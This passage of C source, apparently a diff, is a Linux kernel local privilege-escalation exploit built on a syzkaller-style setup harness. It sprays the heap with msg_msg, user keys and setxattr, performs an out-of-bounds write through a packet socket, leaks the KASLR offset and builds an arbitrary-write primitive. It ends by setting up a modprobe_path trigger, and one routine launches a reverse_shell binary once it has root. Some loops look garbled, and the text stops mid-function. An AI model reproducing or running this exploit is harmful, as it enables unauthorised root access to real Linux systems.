netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_c, strlen(ifname_c) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_c, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_c, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, + sizeof(endpoint_a_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[4], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + 
netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, + sizeof(endpoint_b_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[5], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + +error: + close(sock); +} +static void initialize_netdevices(void) +{ + char netdevsim[16]; + sprintf(netdevsim, "netdevsim%d", (int)procid); + struct { + const char* type; + const char* dev; + } devtypes[] = { + {"ip6gretap", "ip6gretap0"}, {"bridge", "bridge0"}, + {"vcan", "vcan0"}, {"bond", "bond0"}, + {"team", "team0"}, {"dummy", "dummy0"}, + {"nlmon", "nlmon0"}, {"caif", "caif0"}, + {"batadv", "batadv0"}, {"vxcan", "vxcan1"}, + {"netdevsim", netdevsim}, {"veth", 0}, + {"xfrm", "xfrm0"}, {"wireguard", "wg0"}, + {"wireguard", "wg1"}, {"wireguard", "wg2"}, + }; + const char* devmasters[] = {"bridge", "bond", 
"team", "batadv"}; + struct { + const char* name; + int macsize; + bool noipv6; + } devices[] = { + {"lo", ETH_ALEN}, + {"sit0", 0}, + {"bridge0", ETH_ALEN}, + {"vcan0", 0, true}, + {"tunl0", 0}, + {"gre0", 0}, + {"gretap0", ETH_ALEN}, + {"ip_vti0", 0}, + {"ip6_vti0", 0}, + {"ip6tnl0", 0}, + {"ip6gre0", 0}, + {"ip6gretap0", ETH_ALEN}, + {"erspan0", ETH_ALEN}, + {"bond0", ETH_ALEN}, + {"veth0", ETH_ALEN}, + {"veth1", ETH_ALEN}, + {"team0", ETH_ALEN}, + {"veth0_to_bridge", ETH_ALEN}, + {"veth1_to_bridge", ETH_ALEN}, + {"veth0_to_bond", ETH_ALEN}, + {"veth1_to_bond", ETH_ALEN}, + {"veth0_to_team", ETH_ALEN}, + {"veth1_to_team", ETH_ALEN}, + {"veth0_to_hsr", ETH_ALEN}, + {"veth1_to_hsr", ETH_ALEN}, + {"hsr0", 0}, + {"dummy0", ETH_ALEN}, + {"nlmon0", 0}, + {"vxcan0", 0, true}, + {"vxcan1", 0, true}, + {"caif0", ETH_ALEN}, + {"batadv0", ETH_ALEN}, + {netdevsim, ETH_ALEN}, + {"xfrm0", ETH_ALEN}, + {"veth0_virt_wifi", ETH_ALEN}, + {"veth1_virt_wifi", ETH_ALEN}, + {"virt_wifi0", ETH_ALEN}, + {"veth0_vlan", ETH_ALEN}, + {"veth1_vlan", ETH_ALEN}, + {"vlan0", ETH_ALEN}, + {"vlan1", ETH_ALEN}, + {"macvlan0", ETH_ALEN}, + {"macvlan1", ETH_ALEN}, + {"ipvlan0", ETH_ALEN}, + {"ipvlan1", ETH_ALEN}, + {"veth0_macvtap", ETH_ALEN}, + {"veth1_macvtap", ETH_ALEN}, + {"macvtap0", ETH_ALEN}, + {"macsec0", ETH_ALEN}, + {"veth0_to_batadv", ETH_ALEN}, + {"veth1_to_batadv", ETH_ALEN}, + {"batadv_slave_0", ETH_ALEN}, + {"batadv_slave_1", ETH_ALEN}, + {"geneve0", ETH_ALEN}, + {"geneve1", ETH_ALEN}, + {"wg0", 0}, + {"wg1", 0}, + {"wg2", 0}, + }; + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + unsigned i; + for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) + netlink_add_device(&nlmsg, sock, devtypes[i].type, devtypes[i].dev); + for (i = 0; i < sizeof(devmasters) / (sizeof(devmasters[0])); i++) { + char master[32], slave0[32], veth0[32], slave1[32], veth1[32]; + sprintf(slave0, "%s_slave_0", devmasters[i]); + sprintf(veth0, "veth0_to_%s", 
devmasters[i]); + netlink_add_veth(&nlmsg, sock, slave0, veth0); + sprintf(slave1, "%s_slave_1", devmasters[i]); + sprintf(veth1, "veth1_to_%s", devmasters[i]); + netlink_add_veth(&nlmsg, sock, slave1, veth1); + sprintf(master, "%s0", devmasters[i]); + netlink_device_change(&nlmsg, sock, slave0, false, master, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, slave1, false, master, 0, 0, NULL); + } + netlink_device_change(&nlmsg, sock, "bridge_slave_0", true, 0, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, "bridge_slave_1", true, 0, 0, 0, NULL); + netlink_add_veth(&nlmsg, sock, "hsr_slave_0", "veth0_to_hsr"); + netlink_add_veth(&nlmsg, sock, "hsr_slave_1", "veth1_to_hsr"); + netlink_add_hsr(&nlmsg, sock, "hsr0", "hsr_slave_0", "hsr_slave_1"); + netlink_device_change(&nlmsg, sock, "hsr_slave_0", true, 0, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, "hsr_slave_1", true, 0, 0, 0, NULL); + netlink_add_veth(&nlmsg, sock, "veth0_virt_wifi", "veth1_virt_wifi"); + netlink_add_linked(&nlmsg, sock, "virt_wifi", "virt_wifi0", + "veth1_virt_wifi"); + netlink_add_veth(&nlmsg, sock, "veth0_vlan", "veth1_vlan"); + netlink_add_vlan(&nlmsg, sock, "vlan0", "veth0_vlan", 0, htons(ETH_P_8021Q)); + netlink_add_vlan(&nlmsg, sock, "vlan1", "veth0_vlan", 1, htons(ETH_P_8021AD)); + netlink_add_macvlan(&nlmsg, sock, "macvlan0", "veth1_vlan"); + netlink_add_macvlan(&nlmsg, sock, "macvlan1", "veth1_vlan"); + netlink_add_ipvlan(&nlmsg, sock, "ipvlan0", "veth0_vlan", IPVLAN_MODE_L2, 0); + netlink_add_ipvlan(&nlmsg, sock, "ipvlan1", "veth0_vlan", IPVLAN_MODE_L3S, + IPVLAN_F_VEPA); + netlink_add_veth(&nlmsg, sock, "veth0_macvtap", "veth1_macvtap"); + netlink_add_linked(&nlmsg, sock, "macvtap", "macvtap0", "veth0_macvtap"); + netlink_add_linked(&nlmsg, sock, "macsec", "macsec0", "veth1_macvtap"); + char addr[32]; + sprintf(addr, DEV_IPV4, 14 + 10); + struct in_addr geneve_addr4; + if (inet_pton(AF_INET, addr, &geneve_addr4) <= 0) + exit(1); + struct in6_addr geneve_addr6; + if 
(inet_pton(AF_INET6, "fc00::01", &geneve_addr6) <= 0) + exit(1); + netlink_add_geneve(&nlmsg, sock, "geneve0", 0, &geneve_addr4, 0); + netlink_add_geneve(&nlmsg, sock, "geneve1", 1, 0, &geneve_addr6); + netdevsim_add((int)procid, 4); + netlink_wireguard_setup(); + for (i = 0; i < sizeof(devices) / (sizeof(devices[0])); i++) { + char addr[32]; + sprintf(addr, DEV_IPV4, i + 10); + netlink_add_addr4(&nlmsg, sock, devices[i].name, addr); + if (!devices[i].noipv6) { + sprintf(addr, DEV_IPV6, i + 10); + netlink_add_addr6(&nlmsg, sock, devices[i].name, addr); + } + uint64_t macaddr = DEV_MAC + ((i + 10ull) << 40); + netlink_device_change(&nlmsg, sock, devices[i].name, true, 0, &macaddr, + devices[i].macsize, NULL); + } + close(sock); +} +static void initialize_netdevices_init(void) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + struct { + const char* type; + int macsize; + bool noipv6; + bool noup; + } devtypes[] = { + {"nr", 7, true}, + {"rose", 5, true, true}, + }; + unsigned i; + for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) { + char dev[32], addr[32]; + sprintf(dev, "%s%d", devtypes[i].type, (int)procid); + sprintf(addr, "172.30.%d.%d", i, (int)procid + 1); + netlink_add_addr4(&nlmsg, sock, dev, addr); + if (!devtypes[i].noipv6) { + sprintf(addr, "fe88::%02x:%02x", i, (int)procid + 1); + netlink_add_addr6(&nlmsg, sock, dev, addr); + } + int macsize = devtypes[i].macsize; + uint64_t macaddr = 0xbbbbbb + + ((unsigned long long)i << (8 * (macsize - 2))) + + (procid << (8 * (macsize - 1))); + netlink_device_change(&nlmsg, sock, dev, !devtypes[i].noup, 0, &macaddr, + macsize, NULL); + } + close(sock); +} + +static void setup_common() +{ + if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) { + } +} + +static void loop(); + +static int wait_for_loop(int pid) +{ + if (pid < 0) + exit(1); + int status = 0; + while (waitpid(-1, &status, __WALL) != pid) { + } + return WEXITSTATUS(status); +} + +static void 
drop_caps(void) +{ + struct __user_cap_header_struct cap_hdr = {}; + struct __user_cap_data_struct cap_data[2] = {}; + cap_hdr.version = _LINUX_CAPABILITY_VERSION_3; + cap_hdr.pid = getpid(); + if (syscall(SYS_capget, &cap_hdr, &cap_data)) + exit(1); + const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE); + cap_data[0].effective &= ~drop; + cap_data[0].permitted &= ~drop; + cap_data[0].inheritable &= ~drop; + if (syscall(SYS_capset, &cap_hdr, &cap_data)) + exit(1); +} + +static int real_uid; +static int real_gid; +__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20]; + +static int namespace_sandbox_proc(void* arg) +{ + write_file("/proc/self/setgroups", "deny"); + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) + exit(1); + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) + exit(1); + initialize_netdevices_init(); + if (unshare(CLONE_NEWNET)) + exit(1); + initialize_netdevices(); + + loop(); + exit(1); +} + +static int do_sandbox_namespace(void) +{ + setup_common(); + real_uid = getuid(); + real_gid = getgid(); + mprotect(sandbox_stack, 4096, PROT_NONE); + int pid = + clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64], + CLONE_NEWUSER | CLONE_NEWPID, 0); + return wait_for_loop(pid); +} + +uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; + +struct fork_args { + int n; + unsigned int time; +}; + +void fork_spary_n(int n, unsigned int time, int debug){ + int i; + int pid ; + for(i = 0;i < n;i++){ + pid = fork(); + if(pid ==0){ + ioctl(-1, 0x37778, &debug); + sleep(time); + if(getuid() == 0){ + fprintf(stderr, "[+] now get r00t\n" ); + system("id"); + system("/home/p4nda/Desktop/reverse_shell"); + } else{ + pause(); + } + } + } +} + +#include +#include +#include + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, 
PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_VERSION)"); + exit(EXIT_FAILURE); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_RX_RING)"); + exit(EXIT_FAILURE); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + perror("[-] socket(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + perror("[-] bind(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + return s; +} + +void initialise_shared(shared_data **data) +{ + // place our shared data in shared memory + int prot = PROT_READ | PROT_WRITE; + int flags = MAP_SHARED | MAP_ANONYMOUS; + *data = mmap(NULL, sizeof(shared_data), prot, flags, -1, 0); + if (*data == MAP_FAILED) { + perror("mmap"); + exit(EXIT_FAILURE); + } +#ifdef DEBUG + printf("initialise_shared map %lx", *data); +#endif + (*data)->done = 0; + + // initialise mutex so it works properly in shared memory + pthread_mutexattr_t attr; + pthread_mutexattr_init(&attr); + pthread_mutexattr_setpshared(&attr, PTHREAD_PROCESS_SHARED); + pthread_mutex_init(&(*data)->mutex, &attr); + for (int i=0; 
i<=N_PROCS; i++) + pthread_mutex_init(&(*data)->proc_mutex[i], &attr); +} + +int pagealloc_pad(int count, int size) { + return packet_socket_setup(size, 2048, count, 0, 100); +} + +int packet_sock_kmalloc() { + int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); + if (s == -1) { + perror("[-] socket(SOCK_DGRAM)"); + exit(EXIT_FAILURE); + } + return s; +} + +void send_xattr_debug(void *arg) +{ + char name[256]; + void *addr = ((struct spray_argv *)arg)->addr; + int size = ((struct spray_argv *)arg)->size; + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); +#ifdef DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD | PRINT_XATTR); + ioctl(-1, 0x37778, &debug); +#endif + syscall(__NR_setxattr, "./", "exp", addr, size, 0); +} + +void spray_4k_thread(int size, int n) +{ + pthread_t *thr = malloc(sizeof(pthread_t)); + struct spray_argv *arg = (struct spray_argv *)malloc(sizeof(struct spray_argv)); + arg->addr = fuse_mem_addr; + arg->size = size; + pthread_mutex_lock(&spray_lock->mutex); + for (int j=0; jdone++; + pthread_create(thr, NULL, send_xattr_debug, (void *) arg); + } +} + +void release_spray_4k_lock(int limit) { + pthread_mutex_unlock(&spray_lock->mutex); + while (spray_lock->done < limit) + usleep(10000); + spray_lock->done = 0; +} + +int *spray_user_key(int n, int size, int base) +{ + int payload_size = size - sizeof(struct fake_user_key_payload); + int *fd = malloc(n * sizeof(int)); + + void *addr = malloc(0x30000); + char *buf = addr; + char *name = (uint64_t)addr + 0x20000; + memcpy((void*)name, "user\000", 5); + + for (int i = 0; i < n; i++) { + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB-2); + + memset(buf, 0x41, payload_size); + char *des = (uint64_t)addr + 0x10000ul; + sprintf((void*)des, "syz%d\x00", base*n+i); +#ifdef DEBUG + printf("add key %d\n", base); +#endif + fd[i] = syscall(__NR_add_key, name, des, buf, payload_size, -1); + if 
(fd[i] < 0) { + perror("add_key failed\n"); + pause(); + } + } + return fd; +} + +void init_fuse_mem(char *fuse_path, void **fuse_addr, void *base, int size) +{ + fuse_fd = open(fuse_path, O_RDWR); + if (fuse_fd < 0) { + perror("open fuse failed\n"); + exit(1); + } + if (base == NULL) + *fuse_addr = mmap(base, size, PROT_READ | PROT_WRITE, + MAP_SHARED, fuse_fd, 0); + else + *fuse_addr = mmap(base, size, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_FIXED, fuse_fd, 0); + if (*fuse_addr == MAP_FAILED) { + perror("mmap failed\n"); + exit(1); + } +#ifdef DEBUG + printf("mmap-> 0x%llx\n", *fuse_addr); +#endif +} + +void send_xattr(void *arg) +{ + void *addr = ((struct spray_argv *)arg)->addr; + int size = ((struct spray_argv *)arg)->size; + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); + syscall(__NR_setxattr, "./", "exp", addr, size, 0); +} + +void spray_4k(int n, int size) { + if (fuse_mem_addr == NULL) + perror("fuse_mem_addr is NULL"); + + initialise_shared(&spray_lock); + for (int k=0; kaddr = fuse_mem_addr; + arg->size = size; + hang_threads->done++; + pthread_create(&thr, NULL, send_xattr, (void *) arg); + } + pause(); + } + } + + while(spray_lock->done < n * SLAB_4k_OBJS_PER_SLAB-1) { + usleep(10000); + } + spray_lock->done = 0; +} + +void oob_write(char *payload, int size, int oob_page, int fd1, int fd2) { + struct msghdr msg; + struct iovec iov; + char *addr = NULL; + + memset(&iov, 0, sizeof(iov)); + memset(&msg, 0, sizeof(msg)); + + for (int i = 0; i < 8; i++) { + memset((void*)0x20000000+i*PAGE_SIZE+LAST_PAGE_GAP_BYTES, 0x41+i, 4096); + } + + for (int i=8; i<=oob_page; i++) { + addr = 0x20000000+i*PAGE_SIZE+LAST_PAGE_GAP_BYTES; + memset(addr, 0x0, 4096); + memcpy(addr, payload, size); + } + + iov.iov_base = (void*)0x20000000; + iov.iov_len = oob_page*PAGE_SIZE + LAST_PAGE_GAP_BYTES + size; + + msg.msg_name = 0x0; + msg.msg_namelen = 0x0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = 
0; + msg.msg_controllen = 0; + msg.msg_flags = 0; + + if (fd1 != -1) + close(fd1); + if (fd2 != -1) + close(fd2); + + syscall(__NR_sendmsg, r[1], &msg, 0ul); +} + +bool leak_kalsr() { + int fd1, fd2, fd3, fd_vul[N_PROCS], fd_t1, fd_t2; + int num_keys = 20000 / SIZE_OF_USER_KEY_PAYLOAD; + int *key_fd; + char *leak_buf; + + // consume kmalloc-4k slabs in order to make `user_key_payload` allocate new slab from buddy allocator + spray_4k(0x50, SIZE_OF_USER_KEY_PAYLOAD); + printf("[+] spraying 4k objects\n"); + + initialise_shared(&two_loop); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_lock(&two_loop->proc_mutex[i]); + int id = N_PROCS; + for (int i=0; iproc_mutex[id]); + break; + } + if (i==N_PROCS-1) { + // hang main proc + pthread_mutex_unlock(&two_loop->proc_mutex[0]); + pthread_mutex_lock(&two_loop->proc_mutex[N_PROCS]); + } + } + +#ifdef DEBUG + printf("id %d started\n", id); + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD); + ioctl(-1, 0x37778, &debug); +#endif + //pagealloc_pad(0x500, 0x8000); + //sleep(1); + fd_vul[0] = pagealloc_pad(1, 0x8000); + // reserve order 3 pages for target obj1 (user_key_payload) + fd_t1 = pagealloc_pad(1, 0x8000); + // reserve order 3 pages for target obj2 (msg_msg) + fd_t2 = pagealloc_pad(1, 0x8000); + // arrange target obj1 (user_key_payload) to memory 3 (fd3) + //spray_4k(1, SIZE_OF_USER_KEY_PAYLOAD); + spray_4k_thread(SIZE_OF_USER_KEY_PAYLOAD, SLAB_4k_OBJS_PER_SLAB-1); + close(fd_t1); + key_fd = spray_user_key(1, SIZE_OF_USER_KEY_PAYLOAD, id); + spray_4k_thread(SIZE_OF_USER_KEY_PAYLOAD, SLAB_4k_OBJS_PER_SLAB-1); + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB-2); + // arrange target obj2 (msg_msg) to memory 4 (fd4) + //pagealloc_pad(20, 0x8000); + for (int i = 0; i < 100; i++) + { + open("/proc/self/stat", O_RDONLY); + } + close(fd_t2); + //printf("[+] Spraying msg with segments\n"); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (SLAB_4k_CPU_PARTIAL) , PAGE_SIZE+32-SIZE_OF_MSG_MSGSEG, 
1); + +#ifdef DEBUG + printf("id %d finished\n", id); +#endif + + if (id < N_PROCS) { + pthread_mutex_unlock(&two_loop->proc_mutex[id+1]); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } else { + for (int i=0; iproc_mutex[i]); + } + + close(fd_vul[0]); + +#ifdef DEBUG + debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD); + ioctl(-1, 0x37778, &debug); +#endif + + if (id == N_PROCS) { + printf("start oob write\n"); + struct fake_user_key_payload *fake_key = (struct fake_user_key_payload *)malloc(sizeof(struct fake_user_key_payload)+8); + memset(fake_key, 0, sizeof(*fake_key)); + fake_key->next = 0; + fake_key->callback = 0; + fake_key->datalen = 0x7000; + memset(fake_key+sizeof(struct fake_user_key_payload), 0x0, 0x8); + oob_write(fake_key, sizeof(*fake_key)+8, OOB_PAGE, -1, -1); + free(fake_key); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + } + pthread_mutex_lock(&two_loop->proc_mutex[id]); + + leak_buf = malloc(0x8000); + memset(leak_buf, 0x43, 0x8000); + if (syscall(__NR_keyctl, KEYCTL_READ, key_fd[0], leak_buf, 0x8000, 0) == -1) { + perror("keyctl failed"); + } + if (*(uint64_t*)leak_buf != 0x4141414141414141) { + for (int j=0; j<8; j++) { + uint64_t *data = (uint64_t)leak_buf + j*PAGE_SIZE - sizeof(struct fake_user_key_payload) + sizeof(struct fake_msg_msg); +#ifdef DEBUG + printf("msg %d data %llx\n", j, *data); +#endif + if (*data == 0x3737373737373737) { + struct fake_msg_msg *msg = (uint64_t)leak_buf + j*PAGE_SIZE - sizeof(struct fake_user_key_payload); + printf("[+] msg->next %llx\n", msg->next); + msg_next = msg->next; + msglist_next = msg->m_list.next; + msglist_prev = msg->m_list.prev; + break; + } + } + } + + free(leak_buf); + + + if (msg_next == NULL) { + if (id != N_PROCS) + { + two_loop->done++; + printf("[-] %d/%d threads hang\n", two_loop->done, N_PROCS + 1); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + exit(1); + } + else + { + for (int i=0; i<3; i++) { + 
if (two_loop->done == N_PROCS) { + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + return false; + } + sleep(1); + } + pthread_mutex_lock(&two_loop->proc_mutex[id]); + exit(1); + } + } + + + // stage 2: leak kernel address. + // Now we have a correct msg->next pointer, we can freely overwrite struct msg->m_ts + // as well as the msg->next. + if (fork() != 0) { + int status; + wait(&status); + exit(0); + } + + pagealloc_pad(0x100, 0x1000); + for (int i=0; i<50; i++) { +#ifdef DEBUG + debug = (PRINT_PAGE_FREE_DETAIL); + ioctl(-1, 0x37778, &debug); +#endif + pagealloc_pad(0x100, 0x8000); + //sleep(1); +#ifdef DEBUG + debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_MSG); + ioctl(-1, 0x37778, &debug); +#endif + int fd_msg[N_LOOP]; + int msqid_all[4096]; + printf("[+] spraying msg for OOB write\n"); + for (int i=0; i<8; i++) { + fd_vul[i] = pagealloc_pad(1, 0x8000); + fd_msg[i] = pagealloc_pad(1, 0x8000); + } + + for (int i=0; im_list.next = msglist_next; + fake_msg->m_list.prev = msglist_prev; + fake_msg->m_type = 1; + fake_msg->m_ts = 0x1fc8; + fake_msg->next = msg_next; + oob_write(fake_msg, sizeof(*fake_msg), OOB_PAGE, -1, -1); + free(fake_msg); + + leak_buf = malloc(0x2000); + for (int i=0; i 0x1000) { + for (j=1; j 0x%lx(%ld)\n", single_start, single_stop, kaslr_offset, kaslr_offset); + break; + } + } + } + if (kaslr_offset != NULL) + break; + } + + if (kaslr_offset == NULL) + continue; + break; + } + + if (kaslr_offset == NULL) { + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + return false; + } + return true; +} + + +void fuse_sendmsg(struct spary_msg_arg *arg) +{ + int i; + int qbytes = MAX_QBYTES_IN_QUEUE; + int _msqid; + void *target = arg->dst; + int size = arg->size; + + if ((_msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + return false; + } + +#ifdef KERNEL_DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | 
PRINT_PAGE_FREE_DETAIL | PRINT_MSG | PRINT_MSG_DETAIL); + ioctl(-1, 0x37778, &debug); +#endif + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); + struct msgbuf_key *msg_key = target; + //printf("fuse_sendmsg %d start\n", _msqid); + msg_key->mtype = 1; + int ret = msgsnd(_msqid, msg_key, PAGE_SIZE-SIZE_OF_MSG_MSG+size, 0); + //printf("fuse_sendmsg %d done\n", _msqid); + if (ret == -1) { + perror("msgsnd error\n"); + exit(1); + } +} + +int fuse_msg_spray(int num_msg, int size, void *dst) { + int i; + initialise_shared(&spray_lock); + pthread_mutex_lock(&spray_lock->mutex); + for (i = 0; isize = size; + arg->dst = dst; + hang_threads->done++; + pthread_t *thr = malloc(sizeof(pthread_t)); + pthread_create(thr, NULL, &fuse_sendmsg, arg); + } + return i; +} + +bool arb_write(void *target_addr, int size, void *fuse_adr) +{ + int fd_vul; + int fd_msg; + printf("[+] spraying msg for arbitrary write\n"); + initialise_shared(&two_loop); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_trylock(&two_loop->proc_mutex[i]); + int id = N_PROCS; + for (int i=0; iproc_mutex[id]); + break; + } + if (i==N_PROCS-1) { + // hang main proc + pthread_mutex_unlock(&two_loop->proc_mutex[0]); + pthread_mutex_lock(&two_loop->proc_mutex[N_PROCS]); + } + } + + pagealloc_pad(0x100, 0x8000); + +#ifdef KERNEL_DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_MSG_DETAIL); + ioctl(-1, 0x37778, &debug); + printf("id %d started\n", id); +#endif + + fd_vul = pagealloc_pad(1, 0x8000); + fd_msg = pagealloc_pad(1, 0x8000); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (SLAB_4k_CPU_PARTIAL) , PAGE_SIZE+32-SIZE_OF_MSG_MSGSEG, 1); + fuse_msg_spray(SLAB_4k_OBJS_PER_SLAB + 1, size, fuse_adr); + close(fd_msg); + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB + 1); + usleep(10000); + + if (id != N_PROCS) + { + pthread_mutex_unlock(&two_loop->proc_mutex[id+1]); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } else { + for (int 
i=0; iproc_mutex[i]); + } + + close(fd_vul); + + if (id != N_PROCS) + { + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } + + struct fake_msg_msg *fake_msg = (struct fake_msg_msg *)malloc(sizeof(struct fake_msg_msg)); + memset(fake_msg, 0, sizeof(*fake_msg)); + fake_msg->m_list.next = msglist_next; + fake_msg->m_list.prev = msglist_prev; + fake_msg->m_type = 1; + fake_msg->m_ts = PAGE_SIZE-SIZE_OF_MSG_MSG+size; + fake_msg->next = target_addr; + oob_write(fake_msg, sizeof(*fake_msg), OOB_PAGE, -1, -1); + free(fake_msg); + + //write(fuse_pipes[1], "A", 1); +} + + +void modprobe_trigger() +{ + execve(PROC_MODPROBE_TRIGGER, NULL, NULL); +} + +int am_i_root() +{ + struct stat buffer; + int exist = stat("/tmp/exploited", &buffer); + if(exist == 0) + return 1; + else + return 0; +} + +void modprobe_init() +{ + int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT); + if (fd < 0) + { 